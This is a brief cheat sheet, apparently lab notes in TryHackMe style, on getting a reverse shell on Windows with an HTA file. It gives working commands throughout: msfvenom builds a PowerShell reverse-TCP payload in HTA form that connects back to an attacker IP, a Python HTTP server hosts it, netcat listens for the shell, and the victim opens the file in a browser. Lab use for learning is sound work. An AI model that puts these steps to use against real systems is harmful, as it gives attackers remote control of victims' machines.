Skip to content

HTA Reverse Connection

Kali

Generate payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=4444 -f hta-psh -o thm.hta

Expose file

python3 -m http.server

Setup lisener

nc -lvp 4444

Windows

Open in browser

http://10.18.9.175:8000/thm.hta